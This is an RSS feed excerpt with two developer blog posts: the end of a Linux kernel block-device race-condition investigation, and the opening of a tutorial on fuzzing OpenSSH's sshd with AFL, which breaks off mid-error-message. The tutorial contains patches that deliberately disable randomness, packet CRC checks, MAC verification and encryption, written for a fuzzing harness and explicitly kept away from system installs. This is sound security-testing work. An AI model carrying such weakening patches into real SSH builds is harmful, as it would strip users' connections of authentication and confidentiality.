 [&lt;ffffffff810020ae&gt;] ? ___preempt_schedule+0x16/0x18
 [&lt;ffffffff81508e36&gt;] filemap_fdatawrite+0x26/0x30
 [&lt;ffffffff817191b0&gt;] fdatawrite_one_bdev+0x50/0x70
 [&lt;ffffffff817341b4&gt;] iterate_bdevs+0x194/0x210
 [&lt;ffffffff81719160&gt;] ? fdatawait_one_bdev+0x70/0x70
 [&lt;ffffffff817195f0&gt;] ? sync_filesystem+0x240/0x240
 [&lt;ffffffff817196be&gt;] sys_sync+0xce/0x160
 [&lt;ffffffff817195f0&gt;] ? sync_filesystem+0x240/0x240
 [&lt;ffffffff81002b60&gt;] ? exit_to_usermode_loop+0x190/0x190
 [&lt;ffffffff82001a47&gt;] ? check_preemption_disabled+0x37/0x1e0
 [&lt;ffffffff8150455a&gt;] ? __context_tracking_exit.part.4+0x3a/0x1e0
 [&lt;ffffffff81005524&gt;] do_syscall_64+0x1c4/0x4e0
 [&lt;ffffffff83c3276a&gt;] entry_SYSCALL64_slow_path+0x25/0x25
Code: fa 48 c1 ea 03 80 3c 02 00 0f 85 b3 04 00 00 49 8d bd 98 04 00 00 48 b8 00 00 00 00 00 fc ff df 4c 89 63 30 48 89 fa 48 c1 ea 03 &lt;80&gt; 3c 02 00 0f 85 83 04 00 00 4d 8b bd 98 04 00 00 48 b8 00 00
RIP  [&lt;ffffffff8170654d&gt;] wbc_attach_and_unlock_inode+0x23d/0x760
 RSP &lt;ffff880112bf7ca0&gt;
---[ end trace 50fffb72f7adb3e5 ]---</code></pre>This is not exactly the same oops that we saw before, but it’s close enough that it’s very likely to be a related crash. The reproducer is actually taking quite a while to trigger the issue, though. Even though I’ve reduced to two threads/processes executing just a handful of syscalls it still takes nearly half an hour to reproduce in a tight loop. I spend some time playing with the reproducer, trying out different things (<code>read()</code> instead of <code>readahead()</code>, just <code>open()</code>/<code>close()</code> with no reading at all, 2 threads doing <code>sync()</code>, etc.) to see if I can get it to trigger faster. In the end, I find that having many threads doing <code>sync()</code> in parallel seems to be the key to a quick reproducer, on the order of a couple of seconds.<br>
<br>
Now that I have a fairly small reproducer it should be a lot easier to figure out the rest. I can add as many <code>printk()</code>s as I need to validate my theory that <code>sync()</code> should be taking the <code>bd_mutex</code>. For cases like this I set up a VM so that I can start the VM and run the reproducer by running a single command. I also actually like to use <code>trace_printk()</code> instead of plain <code>printk()</code> and boot with <code>ftrace_dump_on_oops</code> on the kernel command line – this way, the messages don’t get printed until the crash actually happens (and have a lower probability of interfering with the race itself; <code>printk()</code> goes directly to the console, which is usually pretty slow).<br>
<br>
I apply this patch and recompile the kernel:<br>
<pre><code>diff --git a/fs/block_dev.c b/fs/block_dev.c
index e17bdbd..fb9d5c5 100644
--- a/fs/block_dev.c
+++ b/fs/block_dev.c
@@ -1292,6 +1292,7 @@ static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)
                                         */
                                        disk_put_part(bdev-&gt;bd_part);
                                        bdev-&gt;bd_part = NULL;
+                                       trace_printk("%p-&gt;bd_disk = NULL\n", bdev);
                                        bdev-&gt;bd_disk = NULL;
                                        bdev-&gt;bd_queue = NULL;
                                        mutex_unlock(&amp;bdev-&gt;bd_mutex);
@@ -1372,6 +1373,7 @@ static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)
 
  out_clear:
        disk_put_part(bdev-&gt;bd_part);
+       trace_printk("%p-&gt;bd_disk = NULL\n", bdev);
        bdev-&gt;bd_disk = NULL;
        bdev-&gt;bd_part = NULL;
        bdev-&gt;bd_queue = NULL;
@@ -1612,6 +1614,7 @@ static void __blkdev_put(struct block_device *bdev, fmode_t mode, int for_part)
 
                disk_put_part(bdev-&gt;bd_part);
                bdev-&gt;bd_part = NULL;
+               trace_printk("%p-&gt;bd_disk = NULL\n", bdev);
                bdev-&gt;bd_disk = NULL;
                if (bdev != bdev-&gt;bd_contains)
                        victim = bdev-&gt;bd_contains;
@@ -1905,6 +1908,7 @@ void iterate_bdevs(void (*func)(struct block_device *, void *), void *arg)
                iput(old_inode);
                old_inode = inode;
 
+               trace_printk("%p-&gt;bd_disk = %p\n", I_BDEV(inode), I_BDEV(inode)-&gt;bd_disk);
                func(I_BDEV(inode), arg);
 
                spin_lock(&amp;blockdev_superblock-&gt;s_inode_list_lock);</code></pre>With this patch applied, I get this output on a crash:<br>
<pre><code>   sync1-1343    3.... 8303954us : iterate_bdevs: ffff88011a0105c0-&gt;bd_disk = ffff880114618880
   sync1-1340    0.... 8303955us : iterate_bdevs: ffff88011a0105c0-&gt;bd_disk = ffff880114618880
   sync1-1343    3.... 8303961us : iterate_bdevs: ffff88011a0105c0-&gt;bd_disk = ffff880114618880
   sync1-1335    1.... 8304043us : iterate_bdevs: ffff88011a0105c0-&gt;bd_disk = ffff880114618880
   sync2-1327    1.... 8304852us : __blkdev_put: ffff88011a0105c0-&gt;bd_disk = NULL
---------------------------------
CPU: 2 PID: 1336 Comm: sync1 Not tainted 4.8.0-rc2+ #170
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff88011212d600 task.stack: ffff880112190000
RIP: 0010:[&lt;ffffffff81f04c3a&gt;]  [&lt;ffffffff81f04c3a&gt;] blk_get_backing_dev_info+0x4a/0x70
RSP: 0018:ffff880112197cd0  EFLAGS: 00010202</code></pre>Since <code>__blkdev_put()</code> is the very last line of output before the crash (and I don’t see any other call setting <code>-&gt;bd_disk</code> to NULL in the last few hundred lines or so), there is a very strong indication that this is the problematic assignment. Rerunning this a couple of times shows that it tends to crash with the same symptoms every time.<br>
<br>
To get slightly more information about the context in which <code>__blkdev_put()</code> is called in, I apply this patch instead:<br>
<pre><code>diff --git a/fs/block_dev.c b/fs/block_dev.c
index e17bdbd..298bf70 100644
--- a/fs/block_dev.c
+++ b/fs/block_dev.c
@@ -1612,6 +1612,7 @@ static void __blkdev_put(struct block_device *bdev, fmode_t mode, int for_part)
 
                disk_put_part(bdev-&gt;bd_part);
                bdev-&gt;bd_part = NULL;
+               trace_dump_stack(0);
                bdev-&gt;bd_disk = NULL;
                if (bdev != bdev-&gt;bd_contains)
                        victim = bdev-&gt;bd_contains;</code></pre>With that, I get the following output:<br>
<pre><code>   &lt;...&gt;-1328    0.... 9309173us : &lt;stack trace&gt;
 =&gt; blkdev_close
 =&gt; __fput
 =&gt; ____fput
 =&gt; task_work_run
 =&gt; exit_to_usermode_loop
 =&gt; do_syscall_64
 =&gt; return_from_SYSCALL_64
---------------------------------
CPU: 3 PID: 1352 Comm: sync1 Not tainted 4.8.0-rc2+ #171
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff88011248c080 task.stack: ffff880112568000
RIP: 0010:[&lt;ffffffff81f04b7a&gt;]  [&lt;ffffffff81f04b7a&gt;] blk_get_backing_dev_info+0x4a/0x70</code></pre>One thing that’s a bit surprising to me is that this actually isn’t called directly from <code>close()</code>, but as a delayed work item on a workqueue. But in any case we can tell it comes from <code>close()</code> since <code>fput()</code> is called when closing a file descriptor.<br>
<br>
Now that I have a fairly good idea of what’s going wrong, it’s time to focus on the fix. This is almost more difficult than what we’ve done so far because it’s such an open-ended problem. Of course I could add a brand new global spinlock to provide mutual exclusion between <code>sync()</code> and <code>clone()</code>, but that would be a bad solution and the wrong thing to do. Usually the author of the code in question had a specific locking scheme or design in mind and the bug is just due to a small flaw or omission somewhere. In other words, it’s usually not a bug in the general architecture of the code (which might require big changes to fix), but a small bug somewhere in the implementation, which would typically require just a few changed lines to fix. It’s fairly obvious that <code>close()</code> is trying to prevent somebody else from seeing <code>bdev-&gt;bd_disk == NULL</code> by wrapping most of the <code>__blkdev_put()</code> code in the <code>-&gt;bdev_mutex</code>. This makes me think that it’s the <code>sync()</code> code path that is missing some locking.<br>
<br>
Looking around <code>__blkdev_put()</code> and <code>iterate_bdevs()</code>, another thing that strikes me is that <code>iterate_bdevs()</code> is able to get a reference to a block device which is nevertheless in the process of being destroyed – maybe the real problem is that the block device is being destroyed too soon (while <code>iterate_bdevs()</code> is holding a reference to it). So it’s possible that <code>iterate_bdevs()</code> simply needs to formally take a reference to the block device by bumping its reference count while it does its work.<br>
<br>
There is a function called <code>bdgrab()</code> which is supposed to take an extra reference to a block device – but only if you aready have one. Thus, using this would be just as racy, since we’re not already formally holding a reference to it. Another function, <code>bd_acquire()</code> seems to formally acquire a reference through a <code>struct inode *</code>. That seems quite promising. It is using the <code>bdev_lock</code> spinlock to prevent the block device from disappearing. I try this tentative patch:<br>
<pre><code>diff --git a/fs/block_dev.c b/fs/block_dev.c
index e17bdbd..489473d 100644
--- a/fs/block_dev.c
+++ b/fs/block_dev.c
@@ -1884,6 +1884,7 @@ void iterate_bdevs(void (*func)(struct block_device *, void *), void *arg)
        spin_lock(&amp;blockdev_superblock-&gt;s_inode_list_lock);
        list_for_each_entry(inode, &amp;blockdev_superblock-&gt;s_inodes, i_sb_list) {
                struct address_space *mapping = inode-&gt;i_mapping;
+               struct block_device *bdev;
 
                spin_lock(&amp;inode-&gt;i_lock);
                if (inode-&gt;i_state &amp; (I_FREEING|I_WILL_FREE|I_NEW) ||
@@ -1905,7 +1906,11 @@ void iterate_bdevs(void (*func)(struct block_device *, void *), void *arg)
                iput(old_inode);
                old_inode = inode;
 
-               func(I_BDEV(inode), arg);
+               bdev = bd_acquire(inode);
+               if (bdev) {
+                       func(bdev, arg);
+                       bdput(bdev);
+               }
 
                spin_lock(&amp;blockdev_superblock-&gt;s_inode_list_lock);
        }</code></pre>My reasoning is that the call to <code>bd_acquire()</code> will prevent <code>close()</code> from actually reaching the bits in <code>__blkdev_put()</code> that do the final cleanup (i.e. setting <code>bdev-&gt;bd_disk</code> to NULL) and so prevent the crash from happening.<br>
<br>
Unfortunately, running the reproducer again shows no change that I can see. It seems that I was wrong about this preventing <code>__blkdev_put()</code> from running: <code>blkdev_close()</code> calls <code>blkdev_put()</code> unconditionally, which calls <code>__blkdev_put()</code> unconditionally.<br>
<br>
Another idea might be to remove the block device from the list that <code>iterate_bdevs()</code> is traversing before setting <code>bdev-&gt;bd_disk</code> to NULL. However, it seems that this is all handled by the VFS and we can’t really change it just for block devices.<br>
<br>
Reading over most of <code>fs/block_dev.c</code>, I decide to fall back to my first (and more obvious) idea: take <code>bd_mutex</code> in <code>iterate_bdevs()</code>. This should be safe since both the <code>s_inode_list_lock</code> and <code>inode-&gt;i_lock</code> are dropped before calling the <code>iterate_bdevs()</code> callback function. However, I am still getting the same crash… On second thought, even taking <code>bd_mutex</code> is not enough because <code>bdev-&gt;bd_disk</code> will still be NULL when <code>__blkdev_put()</code> releases the mutex. Maybe there’s a condition we can test while holding the mutex that will tell us whether the block device is “useable” or not. We could test <code>-&gt;bd_disk</code> directly, which is what we’re really interested in, but that seems like a derived property and not a real indication of whether the block device has been closed or not; <code>-&gt;bd_holders</code> or <code>-&gt;bd_openers</code> MAY be better candidates.<br>
<br>
While digging around trying to figure out whether to check <code>-&gt;bd_disk</code>, <code>-&gt;bd_holders</code>, or <code>-&gt;bd_openers</code>, I came across this comment in one of the functions in the crashing call chain:<br>
<pre><code> 106 /**
 107  * blk_get_backing_dev_info - get the address of a queue's backing_dev_info
 108  * @bdev:       device
 109  *
 110  * Locates the passed device's request queue and returns the address of its
 111  * backing_dev_info.  This function can only be called if @bdev is opened
 112  * and the return value is never NULL.
 113  */
 114 struct backing_dev_info *blk_get_backing_dev_info(struct block_device *bdev)
 115 {
 116         struct request_queue *q = bdev_get_queue(bdev);
 117 
 118         return &amp;q-&gt;backing_dev_info;
 119 }</code></pre>In particular, the “This function can only be called if <span class="citation">@bdev</span> is opened” requirement seems to be violated in our case.<br>
<br>
Taking <code>bdev-&gt;bd_mutex</code> and checking <code>bdev-&gt;bd_disk</code> actually seems to be a fairly reliable test of whether it’s safe to call <code>filemap_fdatawrite()</code> for the block device inode. The underlying problem here is that <code>sync()</code> is able to get a reference to a <code>struct block_device</code> without having it open as a file. Doing something like this does fix the bug:<br>
<pre><code>diff --git a/fs/sync.c b/fs/sync.c
index 2a54c1f..9189eeb 100644
--- a/fs/sync.c
+++ b/fs/sync.c
@@ -81,7 +81,10 @@ static void sync_fs_one_sb(struct super_block *sb, void *arg)
 
 static void fdatawrite_one_bdev(struct block_device *bdev, void *arg)
 {
-       filemap_fdatawrite(bdev-&gt;bd_inode-&gt;i_mapping);
+       mutex_lock(&amp;bdev-&gt;bd_mutex);
+       if (bdev-&gt;bd_disk)
+               filemap_fdatawrite(bdev-&gt;bd_inode-&gt;i_mapping);
+       mutex_unlock(&amp;bdev-&gt;bd_mutex);
 }
 
 static void fdatawait_one_bdev(struct block_device *bdev, void *arg)</code></pre>What I don’t like about this patch is that it simply skips block devices which we don’t have any open file descriptors for. That seems wrong to me because <code>sync()</code> should do writeback on (and wait for) <i>all</i> devices, not just the ones that we happen to have an open file descriptor for. Imagine if we opened a device, wrote a lot of data to it, closed it, called <code>sync()</code>, and <code>sync()</code> returns. Now we should be guaranteed the data was written, but I’m not sure we are in this case.<br>
<br>
Another slightly ugly thing is that we’re now holding a new mutex over a potentially big chunk of code (everything that happens inside <code>filemap_fdatawrite()</code>).<br>
<br>
I’m not sure I can do much better in terms of a small patch at the moment, so I will submit this to the linux-block mailing list with a few relevant people on Cc (Jens Axboe for being the block maintainer, Tejun Heo for having written a lot of the code involved according to <code>git blame</code>, Jan Kara for writing <code>iterate_bdevs()</code>, and Al Viro for probably knowing both the block layer and VFS quite well).<br>
<br>
I submitted my patch here: <a href="https://lkml.org/lkml/2016/8/27/27">lkml.org thread</a><br>
<br>
Rabin Vincent answered pretty quickly that he already sent a fix for the very same issue. Oh well, at least his patch is quite close to what I came up with and I learned quite a few new things about the kernel.<br>
<br>
Tejun Heo also responded that a better fix would probably be to prevent the disk from going away by getting a reference to it. I tried a couple of different patches without much luck. The currently last patch from me in that thread seemed to prevent the crash, but as I only realised a few minutes after sending it: we’re decrementing the reference count without doing anything when it reaches 0! Of course we don’t get a NULL pointer dereference if we never do the cleanup/freeing in the first place…<br>
<br>
If you liked this post and you enjoy fixing bugs like this one, you may enjoy working with us in the Ksplice group at Oracle. Ping me at my Oracle email address :-)]]></content:encoded>
</item>
<item>
<title><![CDATA[Fuzzing the OpenSSH daemon using AFL]]></title>
<description><![CDATA[(EDIT 2017-03-25: All my patches to make OpenSSH more amenable to fuzzing with AFL are available at https://github.com/vegard/openssh-portable. This also includes improvements to the patches found in this post.)American Fuzzy Lop is a great tool. It does take a little bit of extra setup and tweak...]]></description>
<link>https://tsecurity.de/de/3500760/unix-server/fuzzing-the-openssh-daemon-using-afl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500760/unix-server/fuzzing-the-openssh-daemon-using-afl/</guid>
<pubDate>Fri, 08 May 2026 22:54:16 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>(<strong>EDIT 2017-03-25</strong>: All my patches to make OpenSSH more amenable to fuzzing with AFL are available at <a href="https://github.com/vegard/openssh-portable" class="uri">https://github.com/vegard/openssh-portable</a>. This also includes improvements to the patches found in this post.)</p><p><a href="http://lcamtuf.coredump.cx/afl/">American Fuzzy Lop</a> is a great tool. It does take a little bit of extra setup and tweaking if you want to go into advanced usage, but mostly it just works out of the box.</p><p>In this post, I’ll detail some of the steps you need to get started with fuzzing the OpenSSH daemon (sshd) and show you some tricks that will help get results more quickly.</p><p>The AFL home page already displays 4 OpenSSH bugs in its trophy case; these were found by <a href="https://cxsecurity.com/issue/WLB-2015050105">Hanno Böck</a> who used an approach similar to that <a href="https://www.fastly.com/blog/how-fuzz-server-american-fuzzy-lop">outlined by Jonathan Foote</a> on how to fuzz servers with AFL.</p><p>I take a slightly different approach, which I think is simpler: instead of intercepting system calls to fake network activity, we just run the daemon in “inetd mode”. The inet daemon is not used very much anymore on modern Linux distributions, but the short story is that it sets up the listening network socket for you and launches a new process to handle each new incoming connection. inetd then passes the network socket to the target program as stdin/stdout. Thus, when sshd is started in inet mode, it communicates with a single client over stdin/stdout, which is exactly what we need for AFL.</p><h2>Configuring and building AFL</h2><p>If you are just starting out with AFL, you can probably just type <code>make</code> in the top-level AFL directory to compile everything, and it will just work. However, I want to use some more advanced features, in particular I would like to compile sshd using LLVM-based instrumentation (which is slightly faster than the “assembly transformation by sed” that AFL uses by default). Using LLVM also allows us to move the target program’s “fork point” from just before entering main() to an arbitrary location (known as “deferred forkserver mode” in AFL-speak); this means that we can skip some of the setup operations in OpenSSH, most notably reading/parsing configs and loading private keys.</p><p>Most of the steps for using LLVM mode are detailed in AFL’s <code>llvm_mode/README.llvm</code>. On Ubuntu, you should install the <code>clang</code> and <code>llvm</code> packages, then run <code>make -C llvm_mode</code> from the top-level AFL directory, and that’s pretty much it. You should get a binary called <code>afl-clang-fast</code>, which is what we’re going to use to compile sshd.</p><h2>Configuring and building OpenSSH</h2><p>I’m on Linux so I use the “portable” flavour of OpenSSH, which conveniently also uses git (as opposed to the OpenBSD version which still uses CVS – WTF!?). Go ahead and clone it from <code>git://anongit.mindrot.org/openssh.git</code>.</p><p>Run <code>autoreconf</code> to generate the <code>configure</code> script. This is how I run the config script:</p><pre><code>./configure \
    CC="$PWD/afl-2.39b/afl-clang-fast" \
    CFLAGS="-g -O3" \
    --prefix=$PWD/install \
    --with-privsep-path=$PWD/var-empty \
    --with-sandbox=no \
    --with-privsep-user=vegard</code></pre><p>You obviously need to pass the right path to <code>afl-clang-fast</code>. I’ve also created two directories in the current (top-level OpenSSH directory), <code>install</code> and <code>var-empty</code>. This is so that we can run <code>make install</code> without being root (although <code>var-empty</code> needs to have mode 700 and be owned by root) and without risking clobbering any system files (which would be extremely bad, as we’re later going to disable authentication and encryption!). We really do need to run <code>make install</code>, even though we’re not going to be running sshd from the installation directory. This is because sshd needs some private keys to run, and that is where it will look for them.</p><p>(<strong>EDIT 2017-03-25</strong>: Passing <code>--without-pie</code> to <code>configure</code> may help make the resulting binaries easier to debug since instruction pointers will not be randomised.)</p><p>If everything goes well, running <code>make</code> should display the AFL banner as OpenSSH is compiled.</p><p>You may need some extra libraries (<code>zlib1g-dev</code> and <code>libssl-dev</code> on Ubuntu) for the build to succeeed.</p><p>Run <code>make install</code> to install sshd into the <code>install/</code> subdirectory (and again, please don’t run this as root).</p><p>We will have to rebuild OpenSSH a few times as we apply some patches to it, but this gives you the basic ingredients for a build. One particular annoying thing I’ve noticed is that OpenSSH doesn’t always detect source changes when you run <code>make</code> (and so your changes may not actually make it into the binary). For this reason I just adopted the habit of always running <code>make clean</code> before recompiling anything. Just a heads up!</p><h2>Running sshd</h2><p>Before we can actually run sshd under AFL, we need to figure out exactly how to invoke it with all the right flags and options. This is what I use:</p><pre><code>./sshd -d -e -p 2200 -r -f sshd_config -i</code></pre><p>This is what it means:</p><dl><dt><code>-d</code></dt>
<dd>“Debug mode”. Keeps the daemon from forking, makes it accept only a single connection, and keeps it from putting itself in the background. All useful things that we need. </dd>
<dt><code>-e</code></dt>
<dd>This makes it log to stderr instead of syslog; this first of all prevents clobbering your system log with debug messages from our fuzzing instance, and also gives a small speed boost. </dd>
<dt><code>-p 2200</code></dt>
<dd>The TCP port to listen to. This is not really used in inetd mode (<code>-i</code>), but is useful later on when we want to generate our first input testcase. </dd>
<dt><code>-r</code></dt>
<dd>This option is not documented (or not in my man page, at least), but you can find it in the source code, which should hopefully also explain what it does: preventing sshd from re-execing itself. I think this is a security feature, since it allows the process to isolate itself from the original environment. In our case, it complicates and slows things down unnecessarily, so we disable it by passing <code>-r</code>. </dd>
<dt><code>-f sshd_config</code></dt>
<dd>Use the sshd_config from the current directory. This just allows us to customise the config later without having to reinstall it or be unsure about which location it’s really loaded from. </dd>
<dt><code>-i</code></dt>
<dd>“Inetd mode”. As already mentioned, inetd mode will make the server process a single connection on stdin/stdout, which is a perfect fit for AFL (as it will write testcases on the program’s stdin by default). </dd> </dl><p>Go ahead and run it. It should hopefully print something like this:</p><pre><code>$ ./sshd -d -e -p 2200 -r -f sshd_config -i
debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2g  1 Mar 2016
debug1: private host key #0: ssh-rsa SHA256:f9xyp3dC+9jCajEBOdhjVRAhxp4RU0amQoj0QJAI9J0
debug1: private host key #1: ssh-dss SHA256:sGRlJclqfI2z63JzwjNlHtCmT4D1WkfPmW3Zdof7SGw
debug1: private host key #2: ecdsa-sha2-nistp256 SHA256:02NDjij34MUhDnifUDVESUdJ14jbzkusoerBq1ghS0s
debug1: private host key #3: ssh-ed25519 SHA256:RsHu96ANXZ+Rk3KL8VUu1DBzxwfZAPF9AxhVANkekNE
debug1: setgroups() failed: Operation not permitted
debug1: inetd sockets after dupping: 3, 4
Connection from UNKNOWN port 65535 on UNKNOWN port 65535
SSH-2.0-OpenSSH_7.4</code></pre><p>If you type some garbage and press enter, it will probably give you “Protocol mismatch.” and exit. This is good!</p><h2>Detecting crashes/disabling privilege separation mode</h2><p>One of the first obstacles I ran into was the fact that I saw sshd crashing in my system logs, but AFL wasn’t detecting them as crashes:</p><pre><code>[726976.333225] sshd[29691]: segfault at 0 ip 000055d3f3139890 sp 00007fff21faa268 error 4 in sshd[55d3f30ca000+bf000]
[726984.822798] sshd[29702]: segfault at 4 ip 00007f503b4f3435 sp 00007fff84c05248 error 4 in libc-2.23.so[7f503b3a6000+1bf000]</code></pre><p>The problem is that OpenSSH comes with a “privilege separation mode” that forks a child process and runs most of the code inside the child. If the child segfaults, the parent still exits normally, so it masks the segfault from AFL (which only observes the parent process directly).</p><p>In version 7.4 and earlier, privilege separation mode can easily be disabled by adding “UsePrivilegeSeparation no” to <code>sshd_config</code> or passing <code>-o UsePrivilegeSeaparation=no</code> on the command line.</p><p>Unfortunately it looks like <a href="http://marc.info/?l=openssh-unix-dev&amp;m=148948810223933&amp;w=2">the OpenSSH developers are removing the ability to disable privilege separation mode in version 7.5 and onwards</a>. This is not a big deal, as OpenSSH maintainer <a href="https://twitter.com/damienmiller/status/842148901788438528">Damien Miller writes on Twitter</a>: “the infrastructure will be there for a while and it’s a 1-line change to turn privsep off”. So you may have to dive into <code>sshd.c</code> to disable it in the future.</p><p>(<strong>EDIT 2017-03-25</strong>: I’ve pushed the source tweak for disabling privilege separation for 7.5 and newer to my OpenSSH GitHub repo. This also obsoletes the need for a config change.)</p><h2>Reducing randomness</h2><p>OpenSSH uses random nonces during the handshake to prevent “replay attacks” where you would record somebody’s (encrypted) SSH session and then you feed the same data to the server again to authenticate again. When random numbers are used, the server and the client will calculate a new set of keys and thus thwart the replay attack.</p><p>In our case, we explicitly <em>want</em> to be able to replay traffic and obtain the same result two times in a row; otherwise, the fuzzer would not be able to gain any useful data from a single connection attempt (as the testcase it found would not be usable for further fuzzing).</p><p>There’s also the possibility that randomness introduces variabilities in other code paths not related to the handshake, but I don’t really know. In any case, we can easily disable the random number generator. On my system, with the <code>configure</code> line above, all or most random numbers seem to come from <code>arc4random_buf()</code> in <code>openbsd-compat/arc4random.c</code>, so to make random numbers very predictable, we can apply this patch:</p><pre><code>diff --git openbsd-compat/arc4random.c openbsd-compat/arc4random.c
--- openbsd-compat/arc4random.c
+++ openbsd-compat/arc4random.c
@@ -242,7 +242,7 @@ void
 arc4random_buf(void *buf, size_t n)
 {
        _ARC4_LOCK();
-       _rs_random_buf(buf, n);
+       memset(buf, 0, n);
        _ARC4_UNLOCK();
 }
 # endif /* !HAVE_ARC4RANDOM_BUF */</code></pre><p>One way to test whether this patch is effective is to try to packet-capture an SSH session and see if it can be replayed successfully. We’re going to have to do that later anyway in order to create our first input testcase, so skip below if you want to see how that’s done. In any case, AFL would also tell us using its “stability” indicator if something was really off with regards to random numbers (&gt;95% stability is generally good, &lt;90% would indicate that something is off and needs to be fixed).</p><h2>Increasing coverage</h2><h3>Disabling message CRCs</h3><p>When fuzzing, we really want to disable as many checksums as we can, as <a href="https://twitter.com/damienmiller/status/842149046017916928">Damien Miller also wrote on twitter</a>: “fuzzing usually wants other code changes too, like ignoring MAC/signature failures to make more stuff reachable”. This may sound a little strange at first, but makes perfect sense: In a real attack scenario, we can always<a href="http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html#fn1" class="footnoteRef"><sup>1</sup></a> fix up CRCs and other checksums to match what the program expects.</p><p>If we don’t disable checksums (and we don’t try to fix them up), then the fuzzer will make very little progress. A single bit flip in a checksum-protected area will just fail the checksum test and never allow the fuzzer to proceed.</p><p>We could of course also fix the checksum up before passing the data to the SSH server, but this is slow and complicated. It’s better to disable the checksum test in the server and then try to fix it up if we do happen to find a testcase which can crash the modified server.</p><p>The first thing we can disable is the packet CRC test:</p><pre><code>diff --git a/packet.c b/packet.c
--- a/packet.c
+++ b/packet.c
@@ -1635,7 +1635,7 @@ ssh_packet_read_poll1(struct ssh *ssh, u_char *typep)
 
        cp = sshbuf_ptr(state-&gt;incoming_packet) + len - 4;
        stored_checksum = PEEK_U32(cp);
-       if (checksum != stored_checksum) {
+       if (0 &amp;&amp; checksum != stored_checksum) {
                error("Corrupted check bytes on input");
                if ((r = sshpkt_disconnect(ssh, "connection corrupted")) != 0 ||
                    (r = ssh_packet_write_wait(ssh)) != 0)</code></pre><p>As far as I understand, this is a simple (non-cryptographic) integrity check meant just as a sanity check against bit flips or incorrectly encoded data.</p><h3>Disabling MACs</h3><p>We can also disable Message Authentication Codes (MACs), which are the cryptographic equivalent of checksums, but which also guarantees that the message came from the expected sender:</p><pre><code>diff --git mac.c mac.c
index 5ba7fae1..ced66fe6 100644
--- mac.c
+++ mac.c
@@ -229,8 +229,10 @@ mac_check(struct sshmac *mac, u_int32_t seqno,
        if ((r = mac_compute(mac, seqno, data, dlen,
            ourmac, sizeof(ourmac))) != 0)
                return r;
+#if 0
        if (timingsafe_bcmp(ourmac, theirmac, mac-&gt;mac_len) != 0)
                return SSH_ERR_MAC_INVALID;
+#endif
        return 0;
 }
 </code></pre><p>We do have to be very careful when making these changes. We want to try to preserve the original behaviour of the program as much as we can, in the sense that we have to be very careful not to introduce bugs of our own. For example, we have to be very sure that we don’t accidentally skip the test which checks that the packet is large enough to contain a checksum in the first place. If we had accidentally skipped that, it is possible that the program being fuzzed would try to access memory beyond the end of the buffer, which would be a bug which is not present in the original program.</p><p>This is also a good reason to never submit crashing testcases to the developers of a program unless you can show that they also crash a completely unmodified program.</p><h3>Disabling encryption</h3><p>The last thing we can do, unless you wish to only fuzz the unencrypted initial protocol handshake and key exchange, is to disable encryption altogether.</p><p>The reason for doing this is exactly the same as the reason for disabling checksums and MACs, namely that the fuzzer would have no hope of being able to fuzz the protocol itself if it had to work with the encrypted data (since touching the encrypted data with overwhelming probability will just cause it to decrypt to random and utter garbage).</p><p>Making the change is surprisingly simple, as OpenSSH already comes with a psuedo-cipher that just passes data through without actually encrypting/decrypting it. All we have to do is to make it available as a cipher that can be negotiated between the client and the server. We can use this patch:</p><pre><code>diff --git a/cipher.c b/cipher.c
index 2def333..64cdadf 100644
--- a/cipher.c
+++ b/cipher.c
@@ -95,7 +95,7 @@ static const struct sshcipher ciphers[] = {
 # endif /* OPENSSL_NO_BF */
 #endif /* WITH_SSH1 */
 #ifdef WITH_OPENSSL
-       { "none",       SSH_CIPHER_NONE, 8, 0, 0, 0, 0, 0, EVP_enc_null },
+       { "none",       SSH_CIPHER_SSH2, 8, 0, 0, 0, 0, 0, EVP_enc_null },
        { "3des-cbc",   SSH_CIPHER_SSH2, 8, 24, 0, 0, 0, 1, EVP_des_ede3_cbc },
 # ifndef OPENSSL_NO_BF
        { "blowfish-cbc",</code></pre><p>To use this cipher by default, just put “Ciphers none” in your sshd_config. Of course, the client doesn’t support it out of the box either, so if you make any test connections, you have to have to use the <code>ssh</code> binary compiled with the patched <code>cipher.c</code> above as well.</p><p>You <em>may</em> have to pass pass <code>-o Ciphers=none</code> from the client as well if it prefers to use a different cipher by default. Use strace or wireshark to verify that communication beyond the initial protocol setup happens in plaintext.</p><h2>Making it fast</h2><h3><code>afl-clang-fast</code>/LLVM “deferred forkserver mode”</h3><p>I mentioned above that using <code>afl-clang-fast</code> (i.e. AFL’s LLVM deferred forkserver mode) allows us to move the “fork point” to skip some of the sshd initialisation steps which are the same for every single testcase we can throw at it.</p><p>To make a long story short, we need to put a call to <code>__AFL_INIT()</code> at the right spot in the program, separating the stuff that doesn’t depend on a specific input to happen <em>before</em> it and the testcase-specific handling to happen <em>after</em> it. I’ve used this patch:</p><pre><code>diff --git a/sshd.c b/sshd.c
--- a/sshd.c
+++ b/sshd.c
@@ -1840,6 +1840,8 @@ main(int ac, char **av)
        /* ignore SIGPIPE */
        signal(SIGPIPE, SIG_IGN);
 
+       __AFL_INIT();
+
        /* Get a connection, either from inetd or a listening TCP socket */
        if (inetd_flag) {
                server_accept_inetd(&amp;sock_in, &amp;sock_out);</code></pre><p>AFL should be able to automatically detect that you no longer wish to start the program from the top of <code>main()</code> every time. However, with only the patch above, I got this scary-looking error message:</p><pre><code>Hmm, looks like the target binary terminated before we could complete a
handshake with the injected code. Perhaps there is a horrible bug in the
